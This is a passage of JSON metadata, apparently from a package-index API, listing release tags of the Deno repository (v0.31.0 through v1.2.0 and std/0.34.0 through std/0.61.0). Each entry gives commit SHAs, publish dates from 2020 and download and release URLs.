commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.